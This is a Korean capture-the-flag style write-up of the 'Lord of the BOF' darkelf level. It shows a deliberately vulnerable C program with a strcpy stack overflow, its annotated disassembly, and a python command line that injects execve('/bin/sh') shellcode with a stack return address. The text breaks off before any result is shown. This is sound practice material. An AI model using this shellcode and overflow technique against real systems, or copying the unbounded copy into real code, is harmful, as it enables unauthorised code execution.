lvl 06 wolfman -> darkelfWargame/HackerSchool The Load of the BOF Redhat 2019. 3. 11. 09:13
→ 소스코드는 아래와 같다.
1 /*
2 The Lord of the BOF : The Fellowship of the BOF
3 - darkelf
4 - egghunter + buffer hunter + check length of argv[1]
5 */
6
7 #include <stdio.h>
8 #include <stdlib.h>
9
10 extern char **environ;
11
/*
 * Challenge entry point (implicit-int main, no return type written).
 * memset, strlen and strcpy are called without <string.h> -- only
 * <stdio.h> and <stdlib.h> are included -- so they are implicitly
 * declared, which pre-C99 compilers accept.
 *
 * argv[1] is the untrusted input.  It is copied with strcpy into a
 * 40-byte stack buffer after being limited only to 48 bytes, so up to
 * 9 bytes (48 + terminator - 40) run past the buffer into the saved
 * frame pointer and the return address.  A bounded copy rejecting
 * len >= sizeof buffer would close the hole; this binary keeps it on purpose.
 */
main(int argc, char *argv[])
{
    char buffer[40];                    /* destination of the strcpy below */
    int i;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // egghunter: zero every environment string so the environment
    // cannot carry attacker-supplied bytes into the process
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    // Byte 47 of argv[1] is read BEFORE the length check below: an argv[1]
    // shorter than 48 bytes makes this a read past its terminator.
    // Per the disassembly on this page (buffer at ebp-40, return address at
    // ebp+4) byte 47 lands on the most-significant byte of the return address,
    // which is why the check pins it to 0xbf.
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }

    // check the length of argument -- accepts up to 48 bytes, buffer holds 40
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);            /* overflow: up to 49 bytes into 40 */
    printf("%s\n", buffer);

    // buffer hunter: clears the 40 buffer bytes only; anything already
    // written beyond them (saved ebp, return address) is left as is
    memset(buffer, 0, 40);
}
→ 어셈블리 코드는 아래와 같다.
; Disassembly of main (gdb output: Intel operand order, %-prefixed registers), 32-bit x86.
; The original listing's three columns (address, symbol+offset, instruction) are rejoined
; here one instruction per line; no instruction text was changed.
; Frame after the prologue: buffer[40] at [ebp-40], i at [ebp-44],
; saved ebp at [ebp], return address at [ebp+4], argc at [ebp+8], argv at [ebp+12].
0x8048500 <main>      push %ebp
0x8048501 <main+1>    mov %ebp,%esp
0x8048503 <main+3>    sub %esp,44                     ; 40-byte buffer + 4-byte i
0x8048506 <main+6>    cmp DWORD PTR [%ebp+8],1        ; argc < 2 ?
0x804850a <main+10>   jg 0x8048523 <main+35>
0x804850c <main+12>   push 0x8048670                  ; presumably the "argv error" string
0x8048511 <main+17>   call 0x8048410 <printf>
0x8048516 <main+22>   add %esp,4
0x8048519 <main+25>   push 0
0x804851b <main+27>   call 0x8048420 <exit>
0x8048520 <main+32>   add %esp,4
0x8048523 <main+35>   nop
0x8048524 <main+36>   mov DWORD PTR [%ebp-44],0x0     ; i = 0
0x804852b <main+43>   nop
0x804852c <main+44>   lea %esi,[%esi*1]               ; alignment padding, no effect
0x8048530 <main+48>   mov %eax,DWORD PTR [%ebp-44]    ; egghunter loop head: environ[i] == NULL ?
0x8048533 <main+51>   lea %edx,[%eax*4]
0x804853a <main+58>   mov %eax,%ds:0x80497a4          ; presumably environ
0x804853f <main+63>   cmp DWORD PTR [%eax+%edx],0
0x8048543 <main+67>   jne 0x8048547 <main+71>
0x8048545 <main+69>   jmp 0x8048587 <main+135>        ; end of environment -> argv[1][47] check
0x8048547 <main+71>   mov %eax,DWORD PTR [%ebp-44]    ; memset(environ[i], 0, strlen(environ[i]))
0x804854a <main+74>   lea %edx,[%eax*4]
0x8048551 <main+81>   mov %eax,%ds:0x80497a4
0x8048556 <main+86>   mov %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>   push %edx
0x804855a <main+90>   call 0x80483f0 <strlen>
0x804855f <main+95>   add %esp,4
0x8048562 <main+98>   mov %eax,%eax                   ; no-op left by the unoptimised build
0x8048564 <main+100>  push %eax                       ; len
0x8048565 <main+101>  push 0                          ; fill byte
0x8048567 <main+103>  mov %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>  lea %edx,[%eax*4]
0x8048571 <main+113>  mov %eax,%ds:0x80497a4
0x8048576 <main+118>  mov %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>  push %edx                       ; environ[i]
0x804857a <main+122>  call 0x8048430 <memset>
0x804857f <main+127>  add %esp,12
0x8048582 <main+130>  inc DWORD PTR [%ebp-44]         ; i++
0x8048585 <main+133>  jmp 0x8048530 <main+48>
0x8048587 <main+135>  mov %eax,DWORD PTR [%ebp+12]    ; argv
0x804858a <main+138>  add %eax,4                      ; &argv[1]
0x804858d <main+141>  mov %edx,DWORD PTR [%eax]       ; argv[1]
0x804858f <main+143>  add %edx,47
0x8048592 <main+146>  cmp BYTE PTR [%edx],0xbf        ; argv[1][47]: read before the length check below,
                                                      ; so a short argv[1] is read past its terminator
0x8048595 <main+149>  je 0x80485b0 <main+176>
0x8048597 <main+151>  push 0x804867c                  ; presumably "stack is still your friend."
0x804859c <main+156>  call 0x8048410 <printf>
0x80485a1 <main+161>  add %esp,4
0x80485a4 <main+164>  push 0
0x80485a6 <main+166>  call 0x8048420 <exit>
0x80485ab <main+171>  add %esp,4
0x80485ae <main+174>  mov %esi,%esi                   ; alignment padding, no effect
0x80485b0 <main+176>  mov %eax,DWORD PTR [%ebp+12]    ; strlen(argv[1])
0x80485b3 <main+179>  add %eax,4
0x80485b6 <main+182>  mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>  push %edx
0x80485b9 <main+185>  call 0x80483f0 <strlen>
0x80485be <main+190>  add %esp,4
0x80485c1 <main+193>  mov %eax,%eax                   ; no-op
0x80485c3 <main+195>  cmp %eax,48
0x80485c6 <main+198>  jbe 0x80485e0 <main+224>        ; unsigned compare (size_t): accepts len <= 48,
                                                      ; but the destination buffer is only 40 bytes
0x80485c8 <main+200>  push 0x8048699                  ; presumably "argument is too long!"
0x80485cd <main+205>  call 0x8048410 <printf>
0x80485d2 <main+210>  add %esp,4
0x80485d5 <main+213>  push 0
0x80485d7 <main+215>  call 0x8048420 <exit>
0x80485dc <main+220>  add %esp,4
0x80485df <main+223>  nop
0x80485e0 <main+224>  mov %eax,DWORD PTR [%ebp+12]    ; strcpy(buffer, argv[1])
0x80485e3 <main+227>  add %eax,4
0x80485e6 <main+230>  mov %edx,DWORD PTR [%eax]
0x80485e8 <main+232>  push %edx                       ; src = argv[1]
0x80485e9 <main+233>  lea %eax,[%ebp-40]
0x80485ec <main+236>  push %eax                       ; dst = buffer (40 bytes)
0x80485ed <main+237>  call 0x8048440 <strcpy>         ; defect: up to 48 bytes + NUL into 40; bytes 40..43
                                                      ; hit saved ebp, 44..47 the return address
0x80485f2 <main+242>  add %esp,8
0x80485f5 <main+245>  lea %eax,[%ebp-40]              ; printf("%s\n", buffer)
0x80485f8 <main+248>  push %eax
0x80485f9 <main+249>  push 0x80486b0
0x80485fe <main+254>  call 0x8048410 <printf>
0x8048603 <main+259>  add %esp,8
0x8048606 <main+262>  push 40                         ; memset(buffer, 0, 40): clears the buffer only,
0x8048608 <main+264>  push 0                          ; not the overwritten saved ebp / return address
0x804860a <main+266>  lea %eax,[%ebp-40]
0x804860d <main+269>  push %eax
0x804860e <main+270>  call 0x8048430 <memset>
0x8048613 <main+275>  add %esp,12
0x8048616 <main+278>  leave
0x8048617 <main+279>  ret                             ; returns through whatever now sits at [ebp+4]
→ 5번 문제와 크게 다르지 않다. argv[1] 인자의 크기를 48바이트 넘지 않도록 체크하는 로직이 추가되었다. 따라서, 5번 문제와 동일하게 풀면 된다. 스택의 구조는 아래와 같다.
→ 그리고 argv[1]의 주소를 알아내기 위해, 아래와 같은 소스 코드를 추가한다.
printf("[%#x]\n",argv[1]); // added line: prints the address of argv[1] (%#x on a pointer relies on int and pointer being the same width here; %p is the portable form)
→ 알아낸 주소를 바탕으로 다음과 같은 공격을 수행한다. (페이로드는 5번 문제와 동일)
./wolfmaa $(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*20+"\x2b\xfc\xff\xbf"')
→ 결과는 아래와 같다.